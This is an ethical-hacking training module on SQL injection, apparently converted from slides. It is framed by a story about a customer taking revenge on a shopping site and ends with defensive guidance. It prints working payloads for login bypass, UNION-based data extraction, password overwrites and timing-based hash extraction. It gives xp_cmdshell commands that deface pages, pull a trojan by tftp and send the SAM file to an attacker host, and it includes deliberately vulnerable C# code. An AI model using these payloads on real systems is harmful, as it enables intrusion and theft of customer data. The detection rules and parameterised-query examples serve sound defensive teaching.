8/20/2019 CEHv6.1 Module 19 SQL Injection
1/77
Ethical Hacking and Countermeasures Version 6.1
Module 19: SQL Injection
Scenario
Susan was an SQL programmer with a reputed firm. She ordered an expensive anniversary gift for her husband from a shopping portal that was offering better deals, and was promised delivery on the anniversary day. She wanted to give her husband a surprise gift. She was upset on the anniversary day as the gift she ordered was not delivered. She tried to contact the portal but in vain. After several failed attempts to contact the portal, she thought of taking revenge.
What do you think, as an SQL programmer, Susan can do?
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
News
Source: http://www.scmagazineus.com/
Module Objective
This module will familiarize you with:
SQL Injection
Steps for performing SQL Injection
SQL Injection Techniques
SQL Injection in MySql
Attacking SQL servers
Automated Tools for SQL Injection
Countermeasures
Module Flow
Steps for performing SQL Injection
SQL Injection Techniques
Attacking SQL servers
Automated Tools for SQL Injection
What is SQL Injection
SQL injection is a type of security exploit in which the attacker "injects" SQL code through a web form input box to gain access to resources, or make changes to data
It is a technique of injecting SQL commands to exploit non-validated input vulnerabilities in a web application database backend
Programmers use sequential commands with user input, making it easier for attackers to inject commands
Attackers can execute arbitrary commands through the web application
Exploiting Web Applications
SQL injection exploits web applications using client-supplied SQL queries
It enables an attacker to execute unauthorized SQL commands
It also takes advantage of unsafe queries in web applications and builds dynamic SQL queries
For example, when a user logs onto a web page by using a user name and password for validation, a SQL query is used
However, the attacker can use SQL injection to send specially crafted user name and password fields that poison the original SQL query
SQL Injection Steps
What do you need?
Any web browser
Input validation attack occurs here on a website
What Should You Look For
Try to look for pages that allow a user to submit data, for example: a login page, search page, feedback page, etc.
Look for HTML pages that use POST or GET commands
If POST is used, you cannot see the parameters in the URL
Check the source code of the HTML to get information
For example, to check whether it is using POST or GET, look for the <FORM> tag in the source code:
What If It Doesn’t Take Input
If input is not given, check for pages like ASP, JSP, CGI, or PHP
Check the URL that takes the following parameters:
Example:
• http://www.xsecurity.com/index.asp?id=10
In the above example, attackers might attempt:
• http://www.xsecurity.com/index.asp?id=blah' or 1=1--
OLE DB Errors
The user-filled fields are enclosed by a single quotation mark ('). To test, try using (') as the user name
The following error message will be displayed when a (') is entered into a form that is vulnerable to an injection attack
If you get this error, then the website is vulnerable to an SQL injection attack
Input Validation Attack
Input validation attack occurs here on a website
SQL Injection Techniques
Authorization bypass of login forms
Using the SELECT command: used to retrieve data from the database
Using the INSERT command: used to add information to the database
Using SQL Server stored procedures
How to Test for SQL Injection
Depending on the query, try the following possibilities:
• blah' or 1=1--
• Login: blah' or 1=1--
• Password: blah' or 1=1--
• http://search/index.asp?id=blah' or 1=1--
• ' or 1=1--
• " or 1=1--
• ' or 'a'='a
• " or "a"="a
How Does it Work
Attacker breaks into the system by injecting malformed SQL into the query
Original SQL Query:
• strQry = "SELECT Count(*) FROM Users WHERE UserName='" + txtUser.Text + "' AND Password='" + txtPassword.Text + "'";
In the case of the user entering a valid user name of "Paul" and a password of "password", strQry becomes:
• SELECT Count(*) FROM Users WHERE UserName='Paul' AND Password='password'
But when the attacker enters ' Or 1=1 --, the query now becomes:
• SELECT Count(*) FROM Users WHERE UserName='' Or 1=1 --' AND Password=''
Because a pair of hyphens designates the beginning of a comment in SQL, the query becomes simply:
• SELECT Count(*) FROM Users WHERE UserName='' Or 1=1
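The query rewriting described above, reproduced in Python against an in-memory SQLite table so the two outcomes can be compared side by side. This is an added example, not code from the module; the two-row Users table (including the "alice" row) is constructed for the demonstration, and SQLite's "?" placeholder stands in for the @username / @password parameters the module's C# code uses.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the slide's Users table (plain-text passwords, as on the slide)."""
    cnx = sqlite3.connect(":memory:")
    cnx.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    cnx.executemany("INSERT INTO Users VALUES (?, ?)",
                    [("Paul", "password"), ("alice", "s3cret")])
    return cnx


def build_query_unsafe(user, password):
    """String-concatenated query with the same shape as strQry on the slide."""
    return ("SELECT Count(*) FROM Users WHERE UserName='" + user +
            "' AND Password='" + password + "'")


def count_unsafe(cnx, user, password):
    """Runs the concatenated query: a quote and a comment marker in the input become SQL syntax,
    so the WHERE clause is cut off after 'Or 1=1' and every row is counted."""
    return cnx.execute(build_query_unsafe(user, password)).fetchone()[0]


def count_parameterized(cnx, user, password):
    """Same query with bound parameters: the statement shape is fixed before the values are
    supplied, so the input is compared as a literal string and cannot alter the WHERE clause."""
    return cnx.execute(
        "SELECT Count(*) FROM Users WHERE UserName=? AND Password=?",
        (user, password)).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    for u, p in [("Paul", "password"), ("' Or 1=1 --", "")]:
        print(build_query_unsafe(u, p))
        print("  unsafe:", count_unsafe(db, u, p),
              " parameterized:", count_parameterized(db, u, p))
```

With the valid credentials both versions return 1. With the slide's input, the concatenated query returns the total row count (2 here) while the parameterized query returns 0, because the whole string ' Or 1=1 -- is looked up as a user name.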
BadProductList.aspx.cs

using System;
using System.Data;
using System.Data.SqlClient;

private void cmdFilter_Click(object sender, System.EventArgs e) {
    dgrProducts.CurrentPageIndex = 0;
    bindDataGrid();
}

private void bindDataGrid() {
    dgrProducts.DataSource = createDataView();
    dgrProducts.DataBind();
}

private DataView createDataView() {
    string strCnx =
        "server=localhost;uid=sa;pwd=;database=northwind;";
    string strSQL = "SELECT ProductId, ProductName, " +
        "QuantityPerUnit, UnitPrice FROM Products";
    // This code is susceptible to SQL injection attacks.
    // Attack occurs here: the filter text is concatenated straight into the query.
    if (txtFilter.Text.Length > 0) {
        strSQL += " WHERE ProductName LIKE '" + txtFilter.Text + "'";
    }
    SqlConnection cnx = new SqlConnection(strCnx);
    SqlDataAdapter sda = new SqlDataAdapter(strSQL, cnx);
    DataTable dtProducts = new DataTable();
    sda.Fill(dtProducts);
    return dtProducts.DefaultView;
}
Executing Operating System Commands
Use stored procedures like master..xp_cmdshell to perform remote execution
Execute any OS commands
• blah';exec master..xp_cmdshell "insert OS command here" --
Ping a server
• blah';exec master..xp_cmdshell "ping [target IP]" --
Directory listing
• blah';exec master..xp_cmdshell "dir c:\ > c:\directory.txt" --
Create a file
• blah';exec master..xp_cmdshell "echo juggyboy-was-here > c:\juggyboy.txt" --
Executing Operating System Commands (cont'd)
Defacing a web page (assuming that write access is allowed due to misconfiguration)
• blah';exec master..xp_cmdshell "echo you-are-defaced > c:\inetpub\wwwroot\index.htm" --
Execute applications
• blah';exec master..xp_cmdshell "cmd.exe /c appname.exe" --
Upload a Trojan to the server
• blah';exec master..xp_cmdshell "tftp -i 10.0.0.4 GET trojan.exe c:\trojan.exe" --
Download a file from the server
• blah';exec master..xp_cmdshell "tftp -i [attacker IP] put c:\winnt\repair\SAM SAM" --
Getting Output of SQL Query
Use sp_makewebtask to write the result of a query into an HTML file
Example
• blah';EXEC master..sp_makewebtask "\\10.10.1.4\share\creditcard.html", "SELECT * FROM CREDITCARD"
• The above command exports a table called credit card to the attacker's network share
Getting Data from the Database
Using UNION keyword
• http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
• To retrieve information from the above query, use:
• SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
Using LIKE keyword
• http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25LOGIN%25'--
How to Mine all Column Names
To map out all the column names of a table, type:
• http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
To get to the next column name, use NOT IN( )
• http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN('login_id')--
How to Update/Insert Data into the Database
After gathering all column names of a table, it is possible to UPDATE or INSERT records into it:
• Example to change the password for "yuri":
• http://xsecurity.com/index.asp?id=10; UPDATE admin_login SET password='newboy5' WHERE login_name='yuri'--
To INSERT a record:
• http://xsecurity.com/index.asp?id=10; INSERT INTO admin_login (login_id, login_name, password, details) VALUES (111, 'yuri2', 'newboy5', 'NA')--
SQL Injection in Oracle
SQL Injection in Oracle can be performed as follows:
• UNIONs can be added to the existing statement to execute a second statement
• SUBSELECTs can be added to the existing statements
• Data Definition Language (DDL) can be injected if DDL is used in a dynamic SQL string
• INSERTs, UPDATEs, and DELETEs can also be injected
• Anonymous PL/SQL blocks in procedures
SQL Injection in MySql Database
While coding with a MySql application, the injection vulnerability is not exploited easily
It is difficult to trace the output
You can see an error because the value retrieved is passed on to multiple queries
In such situations, SELECT and UNION commands cannot be used
SQL Injection in MySql Database
For example, consider a database "pizza":
• http://www.xsecurity.com/pizza/index.php?a=post&s=reply&t=1'
• To show the tables, type the query:
• mysql> SHOW TABLES;
• mysql> SELECT USER();
• The following query shows the first byte of Admin's hash:
• mysql> SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
• The following query shows the first byte of Admin's hash as an ASCII number:
• mysql> SELECT ASCII('5');
SQL Injection in MySql Database
Preparing the Request
• To inject SQL commands successfully, the request should be cleaned of any single quotes
• mysql> SELECT active_id FROM mb_active UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(53), BENCHMARK(1000000, MD5(CHAR(1))), null) FROM mb_users WHERE user_group = 1;
Exploiting the Vulnerability
• First, log in as a registered user with the rights to reply to the current thread
• http://127.0.0.1/pizza/index.php?a=post&s=reply&t=1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(53), BENCHMARK(1000000, MD5(CHAR(1))), null), null, null, null, null
• You will see a slowdown, because the first byte is CHAR(53), '5'
Attack Against SQL Servers
Techniques involved:
Understand SQL Server and extract the necessaryinformation from the SQL Server Resolution Service
List of servers by Osql-L probes
Sc.exe sweeping of services
Port scanning
Use of commercial alternatives
SQL Server Resolution Service
SSRS service is responsible for sending a response packet containing the connection details of clients who send a specially formed request
The packet contains the details necessary to connect to the desired instance
The SSRS has buffer overflow vulnerabilities that allow remote attackers to overwrite portions of the system's memory and execute arbitrary code
Osql -L Probing
Osql is a command-line utility provided by Microsoft with SQL Server 2000 that allows the user to issue queries to the server
Osql.exe includes a discovery switch (-L) that will poll the network looking for SQL Server instances
It returns a list of server names and instances, but without details about TCP ports or netlibs
SQL Injection Automated Tools
SQLDict
SqlExec
SQLbf
SQLSmack
SQL2.exe
Database Scanner
SQLPoke
NGSSQLCrack
NGSSQuirreL
SQLPing v2.2
Hacking Tool: SQLDict
SQLDict is a dictionary attack tool for SQL Server
It tests if the accounts are strong enough to resist an attack
Source: http://ntsecurity.nu/cgi-bin/download/sqldict.exe.pl
Hacking Tool: SQLExec
This tool executes commands on compromised Microsoft SQL Servers by using the xp_cmdshell stored procedure
It uses a default sa account with a NULL password
USAGE: SQLExec www.target.com
Source: http://phoenix.liu.edu/
SQL Server Password Auditing
The sqlbf tool is used to audit the strength of Microsoft SQL Server passwords offline
The tool can be used either in Brute-Force mode or in Dictionary attack mode
The performance on a 1 GHz Pentium (256 MB) machine is about 750,000 guesses/sec
To be able to perform an audit, the password hashes that are stored in the sysxlogins table are needed
The hashes are easy to retrieve, although a privileged account is needed. The query to use would be:
• select name, password from master..sysxlogins
To perform a dictionary attack on the retrieved hashes:
• sqlbf -u hashes.txt -d dictionary.dic -r out.rep
Hacking Tool: SQLSmack
SQLSmack is a Linux-based remote command execution tool for MSSQL
When provided with a valid user name and password, the tool permits the execution of commands on a remote MS SQL Server by piping them through the stored procedure master..xp_cmdshell
Hacking Tool: SQL2.exe
SQL2 is a UDP buffer overflow remote exploit hacking tool
sqlmap
sqlmap is an automatic SQL injection tool developed in Python
It performs an extensive database management system back-end fingerprint
Features:
• Retrieves usernames, tables, and columns
• Enumerates the entire DBMS
• Reads system files
It supports two SQL injection techniques:
• Blind SQL injection, also known as inferential SQL injection
• Inband SQL injection, also known as UNION query SQL injection
sqlmap: Screenshot 1
Enumerate Database Management System Users
sqlmap: Screenshot 2
Test for SQL injection on POSTed data
sqlmap: Screenshot 3
Test for SQL Injection and DBMS back-end Detection
sqlninja
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application
It performs the following:
• Fingerprints the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, and DB Server authentication mode)
• Bruteforces the 'sa' password
• Privilege escalation to 'sa'
• Creates a custom xp_cmdshell if the original one has been disabled
• Reverse scan in order to look for a port that can be used for a reverse shell
• Direct and reverse shell, both TCP and UDP
Sqlninja: Screenshot 1
Sqlninja: Screenshot 2
Sqlninja: Screenshot 3
Sqlninja: Screenshot 4
Sqlninja: Screenshot 5
Sqlninja: Screenshot 6
SQLIer
SQLIer takes a vulnerable URL and attempts to determine all necessary information to exploit the SQL Injection vulnerability by itself, requiring no user interaction
It can build a UNION SELECT query designed to brute force passwords out of the database
To operate, this script does not use quotes in the exploit
An 8 character password takes approximately 1 minute to crack
SQLIer: Screenshot
Automagic SQL Injector
Automagic SQL Injector is an automated SQL injection tool designed to save time in penetration testing
It is only designed to work with vanilla Microsoft SQL injection holes where errors are returned
Features:
• Browses tables and dumps table data to a CSV file
• Uploads files using the debug script method
• Comprises of an Automagical UDP reverse shell
• Has interactive xp_cmdshell (simulated cmd.exe shell)
Automagic SQL Injector: Screenshot 1
Automagic SQL Injector: Screenshot 2
Absinthe
Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection
Features:
• Has automated injection
• Supports MS SQL Server, MSDE, Oracle, and Postgres
• Has cookies / Additional HTTP Headers
• Comprises of query termination
• Additional text appended to queries
• Supports use of proxies / proxy rotation
• Has multiple filters for page profiling
Absinthe: Screenshot
Blind SQL Injection
Blind SQL injection is a hacking method that allows an unauthorized attacker to access a database server
It is facilitated by a common coding blunder: the program accepts data from a client and executes SQL queries without validating the client's input
Attacker is then free to extract, modify, add, or delete content from the database
Attackers typically test for SQL injection vulnerabilities by sending input that would cause the server to generate an invalid SQL query
Blind SQL Injection: Countermeasures
To secure an application against SQL injection, developers must never allow client-supplied data to modify the syntax of SQL statements
The best protection is to isolate the web application from SQL
All SQL statements required by the application should be in stored procedures and kept on a database server
Application should execute stored procedures using a safe interface such as JDBC's CallableStatement or ADO's Command Object
If arbitrary statements must be used, use PreparedStatements
Both CallableStatements and PreparedStatements compile the statement before the user's input is added, making it impossible to modify the actual SQL statement
Blind SQL Injection: Screenshot
Blind SQL Injection Schema
SQL Injection Countermeasures
Selection of Regular Expressions
Regular expressions for detection of SQL meta characters are:
• /(\%27)|(\')|(\-\-)|(\%23)|(#)/ix
In the above example, the regular expression would be added to the Snort rule as follows:
• alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection - Paranoid"; flow:to_server,established; uricontent:".pl"; pcre:"/(\%27)|(\')|(\-\-)|(%23)|(#)/i"; classtype:Web-application-attack; sid:9099; rev:5;)
Since "#" is not an HTML meta character, it will not be encoded by the browser
SQL Injection Countermeasures
The modified regular expressions for detection of SQL meta characters are:
• /((\%3D)|(=))[^\n]*((\%27)|(\')|(\-\-)|(\%3B)|(;))/i
The regular expressions for a typical SQL injection attack are:
• /\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix
• \w* - zero or more alphanumeric or underscore characters
• (\%27)|\' - the ubiquitous single-quote or its hex equivalent
• ((\%6F)|o|(\%4F))((\%72)|r|(\%52)) - the word "or" with various combinations of its upper and lower case hex equivalents
SQL Injection Countermeasures
The regular expressions for detecting an SQL injection attack using UNION as a keyword:
• /((\%27)|(\'))union/ix
• (\%27)|(\') - the single-quote or its hex equivalent
• union - the keyword union
• The above expression can be used for SELECT, INSERT, UPDATE, DELETE, and DROP keywords
The regular expressions for detecting SQL injection attacks on a MSSQL server:
• /exec(\s|\+)+(s|x)p\w+/ix
• exec - the keyword required to run the stored or extended procedure
• (\s|\+)+ - one or more white spaces, or their HTTP encoded equivalents
• (s|x)p - the letters "sp" or "xp" to identify stored or extended procedures, respectively
• \w+ - one or more alphanumeric or underscore characters to complete the name of the procedure
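The five expressions above, run as a small detector over constructed request lines so their hits and misses can be checked before they are trusted in an IDS rule. This is an added Python example, not part of the module; the rule names, the sample request lines and the scan() helper are all made up for it. Two points it makes visible: the "paranoid" expression is compiled with the i flag only, because in PCRE and Python extended (x) mode an unescaped # opens a comment (the module's own Snort rule also uses /i for it); and the expressions are literal about adjacency, so the "typical" rule needs the quote directly followed by "or" (the module's own blah' or 1=1-- has a space there), the UNION rule needs a quote right before the keyword (id=10 UNION SELECT has none), and the MSSQL rule needs sp/xp right after exec (exec master..xp_cmdshell is missed, exec xp_cmdshell is caught). The generic meta-character rules catch all of these, at the cost of also firing on a benign apostrophe such as O'Brien.

```python
import re

# The five expressions from the module. The first is compiled with /i only: in
# extended (/x) mode an unescaped '#' starts a comment and the pattern would not compile.
RULES = {
    "meta_chars":          re.compile(r"(\%27)|(\')|(\-\-)|(\%23)|(#)", re.I),
    "meta_chars_modified": re.compile(r"((\%3D)|(=))[^\n]*((\%27)|(\')|(\-\-)|(\%3B)|(;))", re.I),
    "typical_or":          re.compile(r"\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))", re.I | re.X),
    "union":               re.compile(r"((\%27)|(\'))union", re.I | re.X),
    "mssql_exec":          re.compile(r"exec(\s|\+)+(s|x)p\w+", re.I | re.X),
}


def classify(request_line):
    """Return the set of rule names whose expression fires on one request line (URI or POST body)."""
    return {name for name, rx in RULES.items() if rx.search(request_line)}


# Constructed sample traffic: a benign request, a benign request containing an apostrophe,
# and strings taken from the module's own test cases (constructed wrapping, not captured traffic).
SAMPLE_REQUESTS = [
    "GET /index.asp?id=10 HTTP/1.1",
    "GET /search.asp?name=O'Brien HTTP/1.1",
    "GET /index.asp?id=blah' or 1=1-- HTTP/1.1",
    "GET /index.asp?id=1'or'1'='1 HTTP/1.1",
    "GET /index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-- HTTP/1.1",
    "POST /login.asp user=blah';exec master..xp_cmdshell 'dir'--",
    "POST /login.asp user=blah';exec xp_cmdshell 'dir'--",
]


def scan(lines=SAMPLE_REQUESTS):
    """Classify every line; returns a list of (line, sorted rule names) for review."""
    return [(line, sorted(classify(line))) for line in lines]


if __name__ == "__main__":
    for line, hits in scan():
        print("%-40s %s" % (",".join(hits) or "-", line))
```

Reading the output this way is the check a practitioner wants before enabling such signatures: the meta-character rules give coverage with false positives, while the keyword rules are precise but miss any spacing or encoding variant they were not written for.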
Preventing SQL Injection
Disable the verbose error messages
Protect the system account “sa”
Audit source codes:
• Escape single quotes
• Input validation
• Reject known bad input
• Input bound checking
Preventing SQL Injection Attacks
Never trust user input
• Validate all textbox entries using validation controls, regular expressions, code, etc.
Never use dynamic SQL
• Use parameterized SQL or stored procedures
Never connect to a database using an admin-level account
• Use a limited access account to connect to the database
Do not store secrets in plain text
• Encrypt or hash passwords and other sensitive data; you should also encrypt the connection strings
Exceptions should divulge minimal information
• Do not reveal much information in error messages; use custom errors to display minimal information in the event of an unhandled error; set debug to false
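The checklist above applied to the module's login form, written in Python with only the standard library. This is an added example, not code from the module: the Users table with a PwHash column, the allowlist patterns, the PBKDF2 parameters and the login() return shape are assumptions. The "limited access account" item has no counterpart here because SQLite has no accounts; on SQL Server it maps to the grants of the connection's login.

```python
import hashlib
import hmac
import logging
import os
import re
import sqlite3

log = logging.getLogger("login")

# "Never trust user input": accept only known-good shapes rather than rejecting known-bad ones.
# Both patterns are assumptions chosen for this example.
ID_RE = re.compile(r"[0-9]{1,9}")              # for a parameter like index.asp?id=10
USER_RE = re.compile(r"[A-Za-z0-9_.-]{1,50}")  # fits the 50-char VarChar on the slide


def validate_id(raw):
    """Return the id as an int, or None if it is anything but a short decimal number."""
    return int(raw) if ID_RE.fullmatch(raw) else None


# "Do not store secrets in plain text": salted PBKDF2 instead of the clear password.
def hash_password(password, salt=None, iterations=200_000):
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password, stored):
    _algo, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)  # constant-time comparison


def make_user_db():
    """Constructed in-memory stand-in for the slide's Users table, holding a hash, not the password."""
    cnx = sqlite3.connect(":memory:")
    cnx.execute("CREATE TABLE Users (UserName TEXT PRIMARY KEY, PwHash TEXT NOT NULL)")
    cnx.execute("INSERT INTO Users VALUES (?, ?)", ("Paul", hash_password("password")))
    return cnx


FAILED = "Login attempt failed."  # the same generic text the module's GoodLogin page shows


def login(cnx, user, password):
    """Return (authenticated, message). The message never carries SQL or schema details."""
    if not USER_RE.fullmatch(user):
        return False, FAILED
    try:
        # "Never use dynamic SQL": fixed statement shape, the name is bound as a parameter.
        row = cnx.execute("SELECT PwHash FROM Users WHERE UserName=?", (user,)).fetchone()
    except sqlite3.Error as exc:
        # "Exceptions should divulge minimal information": detail goes to the log, not the user.
        log.error("login query failed for %r: %s", user, exc)
        return False, FAILED
    if row is None or not verify_password(password, row[0]):
        return False, FAILED
    return True, "Welcome, %s" % user


if __name__ == "__main__":
    db = make_user_db()
    print(validate_id("10"), validate_id("blah' or 1=1--"))
    print(login(db, "Paul", "password"))
    print(login(db, "' Or 1=1 --", ""))
```

The slide's injection string is rejected twice over: the allowlist turns it away before any query runs, and even if it reached the database it would only be compared as a literal user name. A wrong password, an unknown user and a database error all produce the same message, so the response leaks nothing about which check failed.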
GoodLogin.aspx.cs

using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web.Security;

private void cmdLogin_Click(object sender, System.EventArgs e) {
    string strCnx = ConfigurationSettings.AppSettings["cnxNWindBad"];
    using (SqlConnection cnx = new SqlConnection(strCnx))
    {
        SqlParameter prm;
        cnx.Open();
        string strQry =
            "SELECT Count(*) FROM Users WHERE UserName=@username " +
            "AND Password=@password";
        int intRecs;
        SqlCommand cmd = new SqlCommand(strQry, cnx);
        cmd.CommandType = CommandType.Text;
        // The statement text is fixed; the user's input is bound as parameter values.
        prm = new SqlParameter("@username", SqlDbType.VarChar, 50);
        prm.Direction = ParameterDirection.Input;
        prm.Value = txtUser.Text;
        cmd.Parameters.Add(prm);
        prm = new SqlParameter("@password", SqlDbType.VarChar, 50);
        prm.Direction = ParameterDirection.Input;
        prm.Value = txtPassword.Text;
        cmd.Parameters.Add(prm);
        intRecs = (int) cmd.ExecuteScalar();
        if (intRecs > 0) {
            FormsAuthentication.RedirectFromLoginPage(txtUser.Text, false);
        }
        else {
            lblMsg.Text = "Login attempt failed.";
        }
    }
}
SQL Injection Blocking Tool: SQLBlock
Source: http://www.sqlblock.com
SQLBlock is an ODBC/JDBC driver with a patent pending SQL injection prevention feature
It works as an ordinary ODBC/JDBC data source, and monitors every statement being executed
If the client application tries to execute any un-allowed SQL statements, it blocks the execution and sends an alert to the administrator
SQLBlock: Screenshot
Acunetix Web Vulnerability Scanner
Acunetix Web Vulnerability Scanner can automatically detect and report any SQL Injection vulnerabilities
Other features include:
• Cross site scripting / XSS vulnerabilities
• Google hacking vulnerabilities
Source: http://www.acunetix.com
What Happened Next
Susan searched the Internet for security vulnerabilities of a portal. By chance, she got an online forum listing SQL vulnerabilities of e-shopping4u.com. A SQL programmer herself, she crafted an SQL query and submitted it through the registration form. And to her surprise, she was able to bypass all input validations.
She could now access the databases of e-shopping4u.com and play with thousands of their customers' records consisting of credit card and other personal information. Losses to e-shopping4u.com could be devastating.
Summary
SQL injection is an attack methodology that targets the data residing in a database
It attempts to modify the parameters of a web-based application in order to alter the SQL statements that are parsed in order to retrieve data from the database
Database footprinting is the process of mapping the tables on the database
Exploits occur due to coding errors as well as inadequate validation
Prevention involves enforcing better coding practices and database administration procedures